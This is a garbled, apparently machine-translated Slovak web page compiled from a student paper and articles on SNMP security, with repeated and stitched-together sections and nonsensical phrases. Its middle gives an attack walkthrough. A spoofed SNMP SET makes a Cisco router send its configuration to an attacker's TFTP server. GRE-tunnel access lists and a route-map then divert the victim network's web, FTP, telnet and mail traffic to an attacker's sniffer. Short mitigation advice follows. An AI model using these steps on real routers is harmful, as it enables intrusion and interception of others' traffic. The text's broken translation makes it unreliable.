Periféria
Vyhľadajte na stránke
Hľadať VISNOVOK
Výskum je venovaný bezpečnosti napájania organizácie okrajovej komunikácie pomocou doplnkového protokolu SNMP.
Proces odhalil zvláštnosti menovaného protokolu a možné problémy s jeho korupciou.
Na zdôvodnenie problému boli poskytnuté štatistické údaje, ktoré potvrdzujú vysokú spoľahlivosť realizácie hraničných útokov.

Okrem toho je teoreticky možné poskytnúť informácie o štruktúre protokolu, vzore vstupov/výstupov a štádiách extrakcie vstupov zo vstupov.
V rámci práce na kurze bola vykonaná analýza možných útokov na protokol SNMP, medzi ktorými možno vidieť Dos-útoky, útoky typu „Buffer Overflow“ a nezrovnalosti vo formáte.
Samozrejme, potenciálnych hrozieb je oveľa viac, ale pohľad na ne sprostredkuje hlbšie a komplexnejšie vyšetrovanie. pomocou protokolu SNMP.
Prote, organizácia riadenia a monitorovania oplotenia prostredníctvom tohto protokolu spôsobí, že prvky oplotenia budú zraniteľné voči útokom.
Do popredia sa teda dostáva sila technológie na zabránenie hraničným útokom pri ľahkom vývoji internetových služieb a vyžaduje si komplexnú analýzu.
Samotná téma vyšetrovania je relevantná.
Viacerí autori venovali svoju pozornosť ochrane poplašných systémov pred útokmi na protokol SNMP, ale neexistuje konsenzus o hodnote SNMP prostredníctvom zložitosti bezpečnosti.
Preto M. Flenov vo svojej knihe „Linux z pohľadu hackera“ videl nedostatky v tomto protokole a neodporúča jeho používanie.
Smirnova.
B. Úvodná učebnica „Komutačné a smerovacie technológie v lokálnych počítačových sieťach“ obsahuje informácie o bohato adresovateľných schémach prenosu dát a efektívnom riadení sieťových sietí pomocou doplnkového protokolu SNMP, no aj vy môžete vidieť nutričnú bezpečnosť vašej stagnácie.
Ďalší prehľad odbornej literatúry a internetu potvrdil potrebu vysledovať silu bezpečného pripojenia k protokolu SNMP, aby bolo možné rozhodnúť o užitočnosti tohto zdroja. Základom tohto rozhodnutia bude analýza možných útokov a efektívnosť metód na ich porazenie.
Meta-vyšetrenie – vykonajte komplexnú analýzu možných útokov na protokol SNMP a protiopatrenia.
Aby ste dosiahli značku, potrebujete nízky príkaz:
1. Vykonajte prehľad literatúry a internetových zdrojov o organizácii bezpečnej komunikácie od okraja po okraj založenej na protokole SNMP.
2. Pochopiť potrebu vyvinúť metódy útokov na protokol SNMP a spôsoby ich porazenia.

3. Pozrite si funkcie správy protokolu SNMP.
4. Analyzujte zariadenie pre protokol SNMP.
5. Popíšte metódy na predchádzanie útokom na protokol SNMP.
Objektom dohľadu je protokol SNMP.
Predmetom skúmania sú metódy okrajových útokov na protokol SNMP a spôsoby ich porazenia.
Metódy výskumu: analýza, syntéza, prenos informácií.
Práca v kurze pozostáva zo vstupu, dvoch častí a hlavných častí.
2.2 SPÔSOB PROTI ÚTOKOM NA PROTOKOLE SNMP 15
VISNOVOK 20
ZOZNAM VIKORISTANIH JEREL 21

ZOZNAM VIKORISTANIH JEREL
Regulačné akty
1. Federálny zákon Ruskej federácie z 27. júna 2006. N 149-FZ O informáciách, informačných technológiách a ochrane informácií
Zoznam odbornej a vedeckej literatúry
2. Blank-Edelman D. Perl pre správu systému, M: symbol-Plus, 2009. - 478 s.
3. Borodakiy V.Yu. Prax a vyhliadky na vytváranie ukradnutých informácií a výpočtového odpadu na základe MSS OGV / V.Yu.
Borodakiy, A.Yu.
Dobrodev, P.A.
Nashchokin // Aktuálne problémy vo vývoji technologických systémov štátnej bezpečnosti, špeciálnej komunikácie a špeciálnej informačnej bezpečnosti: VIII. Všeruská interdisciplinárna vedecká konferencia: materiály a dôkazy (Orel, 13-14 201 3 rubľov).
- asi 10 rokov. Časť 4 / Pre zag.ed.
V.V.
Mizerovej.
- Orol: Akade
moja Federálna tarifná služba Ruska, 2013.
4. Grishina N.V. Organizácia komplexného systému informačnej bezpečnosti.
- M.: Gelios ARV, 2009. - 256 s.,
5. Douglas R. Mauro Základy SNMP, 2. vydanie / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012.-725s.
6. Kulgin M.V.
Počítačové opatrenia.
16. Persha Mile, č. 04, 2013 [Elektronický zdroj].
URL: http://www.lastmile.su/journal/article/3823
17. Rodina štandardov SNMP [Elektronický zdroj].
URL: https://ua.wikibooks.org/wiki /SNMP_standards_family

Zahraničná literatúra 18. "CERT Advisory CA-2002-03: Multiple Vulnerabilities in many Implementations of Simple Network Management Protocol (SNMP)", 12 Feb.

2002, (aktuálne 11.3.2002

SNMP

- Toto je protokol na aplikačnej úrovni, pododdiely pre zásobník TCP/IP, ktorý chce jeho implementáciu a ďalšie zásobníky, ako napríklad IPX/SPX. Protokol SNMP sa používa na získavanie informácií zo sieťových zariadení o ich stave, výkone a iných charakteristikách, ktoré sú uložené v databáze Management Information Base (MIB). Jednoduchosť SNMP sa do značnej miery odráža v jednoduchosti SNMP MIB, najmä prvých verzií MIB I a MIB II. Samotný SNMP protokol je navyše veľmi jednoduchý.

    Agent v protokole SNMP je všeobecný prvok, ktorý poskytuje manažérom umiestneným na určitých monitorovacích staniciach prístup k hodnotám premenných MIB a možnosť implementovať funkcie z riadiaceho a monitorovacieho zariadenia.

    Hlavné riadiace operácie sa prenášajú na manažéra a agent SNMP preberá najpasívnejšiu úlohu a prenáša hodnoty nahromadených štatistických údajov manažérovi na ich uloženie.

    S týmto zariadením funguje s minimálnymi investíciami do podpory podporného protokolu.

    Príkaz Set sa používa ako manažér na zmenu hodnoty ľubovoľného objektu.

    Po pomoci príkazu Set budete musieť zariadenie použiť.

    Agent je zodpovedný za pochopenie zmyslovej hodnoty objektu, ktorý sa používa na spracovanie zariadením, a na základe tejto hodnoty vložiť skutočný vstup, ktorý riadi - povoliť port, priradiť port spievajúcej VLAN atď. Príkaz Set je tiež vhodný na inštaláciu , v čase Vikonanne SNMP agent je zodpovedný za odoslanie manažéra 24/7.

Možné reakcie môžu zahŕňať inicializáciu agenta, reštart agenta, ukončenie spojenia, obnovenie spojenia, neplatnú autentifikáciu a stratu najbližšieho smerovača.

Hneď ako k tomu dôjde, agent spustí prerušenie.

Tím Trap je kontaktovaný agentom, aby informoval manažéra o špeciálnej situácii.

Verzia SNMP v.2 pridáva do tejto sady príkaz GetBulk, ktorý umožňuje manažérovi získať množstvo hodnôt zmien v jednej požiadavke.

Tento článok je venovaný protokolu SNMP (Simple Network Management Protocol) - jednému z protokolov modelu OSI, ktorý prakticky nie je pokrytý dokumentáciou vo svete RU-no.

"Prečo si potreboval zažiť posadnutie?"

- Krmivo V.

Snažím sa vniesť trochu svetla do tohto jedla.

  1. Niekedy je v procese fungovania siete potrebné určiť špecifické parametre zariadenia, ako je veľkosť MTU, počet prijatých paketov, povolené porty, operačný systém nainštalovaný v počítači. je potrebné skontrolovať, či je na stroji povolená možnosť presmerovania a oveľa viac.
  2. Na tento účel sa najlepšie hodia SNMP klienti.
  3. Okrem toho má protokol ďalšiu dôležitú vlastnosť, a to schopnosť upravovať údaje o agentoch.
  4. Bolo by šialené povoliť úpravu absolútne akéhokoľvek parametra, aj keď na tom vôbec nezáleží, a počet týchto parametrov, pre ktoré je povolená operácia zápisu, je jednoducho rozmazaný.

Na prvý pohľad sa zdá, že celá teória hraničnej bezpečnosti je jednoduchá, no akonáhle sa dostanete na dno potravín, je jasné, že nie všetko je také zanedbané, ako sa na prvý pohľad zdá.

  1. "Ak sa bojíš vlkov, nechoď do lesa."
  2. Rozhrania - obsahujú 23 objektov, potrebné štatistiky okrajových rozhraní agentov (počet rozhraní, veľkosť MTU, prenosová rýchlosť, fyzické adresy atď.).
  3. AT (3 objekty) – predstavujú vysielaciu adresu.
  4. Už žiadny vikorizmus.
  5. Bula je súčasťou MIB I. Príkladom použitia AT objektov môže byť jednoduchá ARP tabuľka (podrobnejšie o protokole ARP si môžete prečítať v článku „Neštandardný protokol ARP“, ktorý nájdete na stránke www. uinc.ru v časti „Články“ fyzická (MAC) adresa okrajových kariet IP adresa strojov.
  6. S SNMP v2 boli tieto informácie presunuté do MIB pre špecifické protokoly.
  7. IP (42 objektov) - údaje o prechode IP paketov (počet požiadaviek, výstupov, zahodených paketov).
  8. ICMP (26 objektov) - informácie o riadiacich správach (vstupné/výstupné správy, správy atď.).
  9. TCP (19) - všetko, čo je spojené s jednomenným transportným protokolom (algoritmy, konštanty, pripojenia, otvorené porty atď.).
  10. UDP (6) - obdoba protokolu UDP (vstupné/výstupné datagramy, porty, prenosy).

Ich koža vyzerá ako strom rastúci smerom nadol (systém bolestne háda o organizácii DNS).

  • Napríklad na adresu administrátora môžeme prejsť na nasledujúcu cestu: system.sysContact.0, systémová hodina system.sysUpTime.0, popis systému (verzia, jadro a ďalšie informácie o OS): system.sysDescr.0.
  • Na druhej strane, rovnaké údaje môžu byť špecifikované v bodkovej notácii.
  • System.sysUpTime.0 teda predstavuje hodnotu 1.3.0, takže systém má index „1“ v skupinách MIB II a sysUpTime má index 3 v hierarchii skupiny systémov.< max_repetitions; repeatCount++) Теперь представьте себе запрос менеджера на получение списка из сотни значений переменных, посланный в символьном виде, и сравните размер такового с размером аналогичного запроса в точечной нотации. Думаю, Вы понимаете, к чему привела бы ситуация, если бы символьные имена не преобразовывались вышеуказанным образом.
  • Nula na konci cesty hovoriť o skalárnom type údajov, ktoré sa ukladajú.

Príspevky do nového zoznamu (256 objektov MIB II) Nájdete na konci článku v časti „Dodatok“.

V procese robota sa nevyberajú symbolické názvy objektov, ak manažér požiada agenta namiesto parametra system.sysDescr.0, potom v poradí požiadavky bude správa odoslaná objektu skonvertovaná na „1.1.0“ a neprenáša sa „tak ako je“ “.

Ďalej sa pozrieme na príkaz BULK a potom pochopíme, prečo je taký dôležitý.
Týmto dokončíme náš prehľad štruktúry MIB II a prejdeme k popisu interakcie medzi manažérmi (riadiacimi systémami) a agentmi.
V SNMP klient komunikuje so serverom pomocou princípu príjmu energie.
Samotný produkčný prostriedok iniciuje iba svoju činnosť nazývanú pasta (v niektorej literatúre je „pasca“ pasta).
Okrem toho sú všetky akcie agentov redukované na odpovede na požiadavky zaslané manažérmi.
Manažéri majú oveľa väčší priestor pre kreativitu a môžu to urobiť niekoľkými spôsobmi:
GetRequest – vyžiada si od agenta informáciu o jednej zmene.
#define SNMP_MSG_GETBULK (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x5)
#define SNMP_MSG_INFORM (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x6)
#define SNMP_MSG_TRAP2 (ASN_CONTEXT | ASN_CONSTRUCTOR | 0x7)

Os sa tu stretáva s ďalšou dôležitou časťou, ako viete, na paste sú 2 číselné konštanty.

V skutočnosti existujú 2 hlavné verzie protokolu SNMP (v1 a v2) a najdôležitejšie sú tie, ktoré nie sú šialené (v skutočnosti existuje oveľa viac verzií - SNMP v2 (p | c | u) atď. všetky modifikácie nemajú trvalý význam, napríklad zavedenie podpory md5 atď.).

SNMP je protokol pre kontrolu a diagnostiku, ktorý je spojený s nákladmi na poistenie v situáciách, keď je zničená integrita trás a v takejto situácii je potrebné použiť najvhodnejší transportný protokol pre zariadenie, takže r buv zrobleny u b_k UDP.

V súčasnosti sú bezpečnostné opatrenia obzvlášť dôležité, najmä pokiaľ ide o protokoly prenosu údajov, najmä v podnikových sieťach.

  • Po dôkladnom porozumení SNMP v1/v2 je jasné, že vývojári protokolu na to nakoniec mysleli, alebo boli silne dotlačení podmienkami projektu %-).
  • b) útočník beží na lokálnom počítači.

V tomto prípade sa dôveryhodnosť admina prudko zvyšuje.

Aj keď sa nachádzate v jednom segmente siete, môžete ľahko načuchať názvy skupín a bez nich systémové informácie.

To je aj prípad všetkého uvedeného v odseku (a).
Prejdime k „praktickým veciam“.
Čo by ste mohli potrebovať?
Máme pred sebou bezpečnostný program.
Môžete to dosiahnuť na .
Napríklad používam OS Linux, ale syntax príkazu je podobná ako vo Windows PP.

Inštalácia balíka je štandardná:

gunzip udc-snmp-3.5.3.tar.gz

tar-xvf udc-snmp-3.5.3.tar
cd udc-snmp-3.5.3
./configure
urobiť
vykonať inštaláciu
Spustenie démona (agent)
Po inštalácii máte k dispozícii nasledujúce programy:
snmpget
snmpset
snmpgetnext
snmpwalk
snmpbulkwalk
snmpcheck
snmptest

snmpdelta

snmpnetstat snmpstatus

snmptable

snmptrap snmptransstat

a démon

snmptrapd

Je úžasné, aké praktické sa zdajú popisy tejto operácie.

Požiadavku GetRequest implementuje jednomenný program snmpget

Ak chcete odstrániť nepotrebné informácie, zadajte nasledujúci príkaz:

[e-mail chránený]

snmptrap:~# snmpget 10.0.0.2 public system.sysDescr.0 snmptrap

Čo musí server upozorniť:

system.sysDescr.0 = Hardvér: x86 Family 6 Model 5 Krok 0 AT/AT KOMPATIBILNÉ - Softvér: Windows NT verzia 4.0 (číslo zostavy: 1381 bez procesora) snmptrap

(nie je to pravda - je nesprávne dávkovať), inak

system.sysDescr.0 = Linux darkstar 2.4.5 #1 SMP Pia 17. august 09:42:17 EEST 2001 i586

Len tak – zdroj nadhľadu.

Povedzme, že chceme zmeniť nastavenia agenta.

Ako viete, názov skupiny nie je absolútne zašifrovaný (čo znamená číslo verzie protokolu: 1).

Chcel by som upozorniť, že vzhľadom na špecifikáciu protokolu SNMP pakety nemajú jasne definovaný pôvod.

Je jasné, že limit sa rovná limitu UDP, čo je viac ako 65 507 bajtov, ale samotný protokol ukladá inú maximálnu hodnotu - viac ako 484 bajtov.

Nemá nainštalovanú hodnotu a hodnotu hlavičky paketu (headerLength).

Poďme a zoznámime sa s protokolom SNMP.

Čo ešte dodať k vyššie uvedenému... Správcom siete môžete dať aj pár pocty, aby sa zmenilo riziko problémov s vinou pomocou bezpečnej hranice... Najprv musíme venovať pozornosť úprave firewallu.

- V opačnom prípade zmeňte nastavenia za predvolenými názvami skupín.Zahraničná literatúra

Rozumné by bolo striktne evidovať adresy strojov (manažérov), z ktorých je povolené školenie agentov.

V tomto, rešpektujem, môžete ukončiť článok.

Chcel by som veriť, že si ju videl ako tsikavu.

Informačná bezpečnosť – 2006

Dopovid

SNMP - manuálny protokol


alebo hrozbou pre firemnú bezpečnosť

Pravek

Protokol SNMP (Simple Network Management Protocol) poskytuje metódy na správu sieťových zdrojov.

História protokolu SNMP (Simple Network Management Protocol) začína jeho nástupcom SGMP (Simple Gateway Monitoring Protocol), ktorý bol predstavený v RFC 1028 v roku 1987.

odolné voči SNMP;

Ak však máte prácu, manažér môže pokračovať v práci (aj keď možno budete potrebovať trochu viac zusilla)

V súčasnosti konfigurácie zariadení na prenos údajov zahŕňajú štandardný SNMP.Zahraničná literatúraTento protokol sa stal najdôležitejším štandardom pre správu politiky.

- Khiba

Je to hrozba?

Vďaka SNMP verzii štandardu a správnemu nastaveniu zariadenia je možné tento protokol použiť v mnohých prípadoch hackingu, od drobného chuligánstva až po efektívnu komerčnú špionáž.

Správcovia systému často robia nesprávne vyhlásenia o SNMP.

V dôsledku nedostatočného povedomia o protokole a následne aj nedostatočného povedomia o možných problémoch sa bezpečnosť potravín často neberie vážne.

Ešte užitočnejšia je skutočnosť, že protokol SNMP je založený na UDP.

Keďže ide o protokol bez pripojenia, UDP je zraniteľný voči útokom spoofingu IP.

Ak vaša organizácia vlastní Cisco, ste pripravení sledovať, čo môže robiť s SNMP.

Scenár útoku 1.

Nižšie je uvedená presná konfigurácia napadnutého smerovača (smerovač obetí):

Aktuálna konfigurácia: 1206 bajtov

povoliť tajomstvo 5 $1$h2iz$DHYpcqURF0APD2aDuA.

YX0

rozhranie Ethernet0/0

rozhranie Ethernet0/1

IP adresa 192.168.0

sieť 192.168.1.0

IP nat vnútri zdrojového zoznamu 102 rozhranie Ethernet0/0 preťaženie

žiadny IP http server

prístupový zoznam 1 povolenie 192.168.

prístupový zoznam 102 povoliť ip akúkoľvek ľubovoľnú

snmp-server komunity verejné RO

Verzia SNMP v.2 pridáva do tejto sady príkaz GetBulk, ktorý umožňuje manažérovi získať množstvo hodnôt zmien v jednej požiadavke.

snmp-server community private RW 1

snmp-server umožňuje pasce tty

protokolovanie synchrónne

Poďme konečne vytvoriť fragmentovanú požiadavku SNMP.


snmptrap Vikoristovuchi malý Perl skript a Ethereal, nahradíme štandardný SNMP SET „copy config“, ktorý budeme vikoristovať ako základný balík.

######################################################

# ./copy-router-config.

pl

#######################################################

# Kopírovať konfiguráciu smerovača Cisco – pomocou SNMP

# Hacked by muts - *****@***co.

il


Použitie: ./cisco-copy-config.

pl

Uistite sa, že je nastavený TFTP server, najlepšie spustený z /tmp!

Po spustení skriptu sa stiahne SNMP paket.

Ako sa ukázalo, toto sa odošle do smerovača a konfiguračný súbor sa neodošle.

Obnovte hodnotu na adresu IP útočníka (80.179.76.227).

    Teraz pomocou hex editora môžeme zmeniť túto IP adresu a ďalšie polia hlavičky paketu.

V šestnástich systémoch vyzerá počet fragmentovaných IP adries 192.168.1.5 ako C0 A8

Potom nájdeme paket pomocou file2cable (alebo iného generátora paketov).

Balík obchádza pravidlá prístupu SNMP a my získavame konfiguračný súbor smerovača, ktorý je napadnutý cez TFTP.

tunel GRE

GRE (Generic Routing Encapsulation) je tunelovací protokol na zapuzdrenie viacerých typov paketov strednej úrovne v strede paketu strednej úrovne.

Jednou z možností použitia GRE je prepojenie sieťových segmentov IPX cez linkový kanál, ktorý podporuje sieťovú vrstvu modelu OSI.

V tomto prípade budete musieť vytvoriť tunel GRE z jedného smerovača do druhého na prenos paketov IPX tam a späť cez kanál, ktorý podporuje protokol IP.

GRE však použijeme na dosiahnutie cieľov nad rámec jeho primárneho účelu.

    Vytvorili sme rozhranie tunnel0 a určili IP adresu siete ako 192.168.10.x.

Na výmenu dát na konci tunela musia byť vinníci v rovnakej dimenzii.

Naznačili sme, že rozhranie Ethernet0/0 je koniec tunela (inak by sa dal tunel spustiť?) Koniec tunela nie je IP adresa externého rozhrania hackerovho routera.

Zostávajúci príkaz nie je povinný, pretože v zákulisí je stále vytvorený samotný tunel GRE (aj keď sme ich pre väčšiu prehľadnosť pridali).

Teraz môžeme nastaviť prístupové pravidlá (prístupové zoznamy), aby sme špecifikovali typ prevádzky, ktorá má prejsť tunelom, a smerovacie mapy (route-maps) potrebné na presmerovanie prevádzky.

Na tento účel má konfiguračný súbor napadnutého smerovača niekoľko ďalších riadkov:

prístupový zoznam 101 povolí tcp ľubovoľnú ľubovoľnú ekv 443

prístupový zoznam 101 povolí tcp ľubovoľnú ľubovoľnú ekv 80

zoznam prístupových práv 101 povoliť tcp ľubovoľnú ľubovoľnú ekv 21

prístupový zoznam 101 povoliť tcp ľubovoľnú ľubovoľnú ekv 20

prístupový zoznam 101 povoliť tcp ľubovoľnú ľubovoľnú ekv 23

prístupový zoznam 101 povoliť tcp ľubovoľnú ľubovoľnú ekv 25

prístupový zoznam 101 povolí tcp ľubovoľnú ľubovoľnú ekv 110

Umožnili sme prenos dát pomocou protokolov SSL, HTTP, FTP, telnet, SMTP a POP3.

Teraz, ak sa prevádzka riadi vyššie popísanými pravidlami, presmerovania sa odošlú do smerovacích máp, ktorých popisy musia byť pridané do konfiguračného súboru:

Ak vaša organizácia vlastní Cisco, ste pripravení sledovať, čo môže robiť s SNMP.

router-map divert-traffic

    zhoda IP adresy 101

nastaviť ip next-hop 192.168.10.2

ip politika route-map divert-traffic

Vytvorili sme prístupové pravidlo, ktoré povoľuje všetky typy premávky.

Vytvorili sme mapu smerovania odklonenia k snifferovi (táto mapa smerovania presmeruje tunelovú premávku na sniffer).

Vytvorené pravidlo prístupu je vikorystvovaetsya ako mentalita.

Ako next-hop adresy sme zadali IP adresu útočníka (sniffer).

Stiahli sme mapu smerovania do rozhrania tunela0.

Je veľmi dôležité, aby sme vytvorili smerovaciu mapu pre presmerovanie údajov.

Smerovač prijíma tunelované dáta zapuzdrené v pakete GRE a bez dekódovania paketu ich nemôžeme zobraziť.

    Akonáhle útočník (sniffer) prehľadá a prepošle tunelované údaje späť, mapa smerovania presmerovania presmeruje prevádzku späť na smerovač, ktorý je napadnutý.

Prilepili sme smerovaciu kartu k rozhraniu Ethernet.

Začnime útok

Po dokončení všetkých nastavení nám ostáva už len importovať nové úpravy do konfiguračného súboru na smerovači, ktorý je napadnutý.

Výsledkom bude aktivácia GRE tunela a presmerovanie všetkej prevádzky z lokálnej siete napadnutého počítača na hackera (sniffer).

Účinnosť tunela si môžete overiť odoslaním príkazu na nastavenie smerovaču útočníka:

Ladiaci tunel Attacker#

-> 212.199.145.242, tos = 0x0

*3. marca 06:38: Tunel0: GRE/IP pre klasifikáciu 212.199.145.242

->80.179.20.55 (len=108 typ=0x800 ttl=253 tos=0x0)

*3. marca 06:38: Tunel0: oprava susedstva, 80.179.20.55

-> 212 199 145 242, tos = 0 x 0 g všetko

V dôsledku týchto akcií Ethereal zachytí nasledujúce pakety na útočníkovom počítači:

https://pandia.ru/text/78/194/images/image006_20.jpg" width="624" height="468">

- Po niekoľkých rokoch môžeme získať údaje o skenovaní:

Odstránenie údajov a nahradenie aktuálneho typu informácií:

SysName - môžete zistiť adresu, telefónne číslo účastníka

- IP adresa agenta -

- DNS -

- - Čas odozvy --Predajca-

- SystémPopis – môže byť použitý ako doplnková užitočná informácia počas útokovkomunita-

- snmp-

- komunity, pre ďalšie informácie sme stiahli

Miesto - môžete zistiť adresu, telefónne číslo predplatiteľa

Kontakt - môžete zistiť svoje meno, kontaktujte prosím administrátora

- Čas posledného spustenia -

- Rozhrania - čím viac, tým lepšie

- Stav zisťovania -

Z týchto údajov sa odstránia adresy IP a program Monitor siete v reálnom čase, aby sa určilo, aké relevantné informácie možno extrahovať pomocou dodatočných požiadaviek SNMP.

Je tiež možné úplne zakázať prístup k zariadeniu jednoduchým nahradením názvu snmp-community z verejného na súkromné.

Tim sám ukazuje schopnosť premôcť príkazy snmp.

Výsledok útoku:

Po tomto experimente sme zistili, že:

Neodporúča sa používať najjednoduchší spôsob ochrany - zoznamy prístupových práv

Môžete jednoducho určiť počet klientov poskytovateľa

Dôverné informácie klientov poskytovateľa

Ekonomický potenciál poskytovateľa

Niekedy činy reči nie sú také, na aké by mali byť.

Ak pracujete s protokolom SNMP (alebo inými protokolmi založenými na UDP), musíte si byť najprv vedomí úzkych miest a trhlín, ktoré by v prípade prehliadnutia mohli spôsobiť ohrozenie vašej siete.

Metóda je pre zakhistu veľmi jednoduchá.

Zápach bude stále ležať na administrátoroch:

Neodstraňujte štandardné nastavenie (v predvolenom nastavení)

Správne si premyslite schému protokolu vikoristnya

Zmysluplné názvy snmp-community

Vikoristovvati prístupové zoznamy

V zoznamoch prístupových práv uveďte jednotlivé adresy IP, nie rozsahy IP

3. Pozrite si funkcie správy protokolu SNMP.
4. Analyzujte zariadenie pre protokol SNMP.
5. Popíšte metódy na predchádzanie útokom na protokol SNMP.
Objektom dohľadu je protokol SNMP.
Predmetom skúmania sú metódy okrajových útokov na protokol SNMP a spôsoby ich porazenia.
Metódy výskumu: analýza, syntéza, prenos informácií.
Práca v kurze pozostáva zo vstupu, dvoch častí a hlavných častí.
2.2 SPÔSOB PROTI ÚTOKOM NA PROTOKOLE SNMP 15
VISNOVOK 20
- Višňovok

Robotická metóda mala ukázať, že popísaný útok nebol taký účinný ako potenciálne porušenia protokolov založených na UDP.

Obrázok 3 - Obrazovka nástroja SoftPerfectNetworkScanner Záplaty Detektory mnohých meracích zariadení rozoberajú takzvané záplaty, ktoré sú potrebné, keď sa v systéme zistia úniky. Na prednej strane IDS sa nachádza: bezpečnostný subsystém, ktorý zhromažďuje informácie o procesoch, ktoré môžu súvisieť s bezpečnostnými opatreniami alebo systémami, ktoré sú chránené; analytický subsystém, ktorý identifikuje podozrivé prípady a útoky na hraniciach; chrupavka, ktorá uchováva počiatočné kroky a výsledky analýzy; -725 s.

ZOZNAM VIKORISTANIH JEREL
Regulačné akty
1. Federálny zákon Ruskej federácie z 27. júna 2006. N 149-FZ O informáciách, informačných technológiách a ochrane informácií
Zoznam odbornej a vedeckej literatúry
2. Blank-Edelman D. Perl pre správu systému, M: symbol-Plus, 2009. - 478 s.
To neznamená, že vlastníctvo Cisco/ZyXel nie je bezpečné.
Borodakiy, A.Yu.
Dobrodev, P.A.
Nashchokin // Aktuálne problémy vo vývoji technologických systémov štátnej bezpečnosti, špeciálnej komunikácie a špeciálnej informačnej bezpečnosti: VIII. Všeruská interdisciplinárna vedecká konferencia: materiály a dôkazy (Orel, 13-14 201 3 rubľov).
- asi 10 rokov. Časť 4 / Pre zag.ed.
V.V.
Správna konfigurácia by mala minimalizovať šance na obídenie ochrany.
Omilostenia správcov hraníc sú hlavnými dôvodmi kompromisu vlastníctva hraníc.
ZOZNAM VIKORISTANIH JEREL 21
4. Grishina N.V. Organizácia komplexného systému informačnej bezpečnosti.
- M.: Gelios ARV, 2009. - 256 s.,
5. Douglas R. Mauro Základy SNMP, 2. vydanie / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012.-725s.
6. Kulgin M.V.
Počítačové opatrenia.
16. Persha Mile, č. 04, 2013 [Elektronický zdroj].
URL: http://www.lastmile.su/journal/article/3823
17. Rodina štandardov SNMP [Elektronický zdroj].
Fragment pre informáciu

3. Borodakiy V.Yu. Prax a vyhliadky na vytváranie ukradnutých informácií a výpočtového odpadu na základe MSS OGV / V.Yu.:// Borodakiy, A.Yu.. Dobrodev, P.A.. Nashchokin // Aktuálne problémy vo vývoji technologických systémov štátnej bezpečnosti, špeciálnej komunikácie a špeciálnej informačnej bezpečnosti: VIII. Všeruská interdisciplinárna vedecká konferencia: materiály a dôkazy (Orel, 13–14 201 3 rubľov)./

3. Borodakiy V.Yu. Prax a vyhliadky na vytváranie ukradnutých informácií a výpočtového odpadu na základe MSS OGV / V.Yu.:// Borodakiy, A.Yu.. Dobrodev, P.A.. Nashchokin // Aktuálne problémy vo vývoji technologických systémov štátnej bezpečnosti, špeciálnej komunikácie a špeciálnej informačnej bezpečnosti: VIII. Všeruská interdisciplinárna vedecká konferencia: materiály a dôkazy (Orel, 13–14 201 3 rubľov)./

- Asi 10 rokov. Časť 4 / Pre zag.ed.

V.V.

Mizerovej.

- Orel: Akadémia Federálnej colnej služby Ruska, 2013.

9. Technológie prepínania a smerovania v lokálnych počítačových sieťach: základná príručka / Smirnova.

St ta in;

vyd.

A.V.

Dôverné informácie sú informácie, ktoré má Volodya, právnik alebo akákoľvek iná fyzická alebo právnická osoba k dispozícii a ktoré sú rozšírené o ich povinnosti podľa ich stavu mysle.

Integrita informácií (celistvosť údajov) je termín v informačnej vede a teórii telekomunikácií, čo znamená, že údaje sa od konca Veľkej vlasteneckej vojny nezmenili, či už sa na nich vykonala akákoľvek operácia, prenos, ukladanie alebo poskytovanie.

Dostupnosť informácií - stav informácií (zdrojov automatizovaného informačného systému), ku ktorým má subjekt prístupové práva, ich môže bez prerušenia implementovať.

Prístupové práva: právo na čítanie, zmenu, kopírovanie, stratu a zmenu informácií, kopírovanie, obmedzenie zdrojov.

Existujú tri hlavné spôsoby ochrany informácií, zoradené podľa dôležitosti:

· Organizačné metódy pre informačnú bezpečnosť.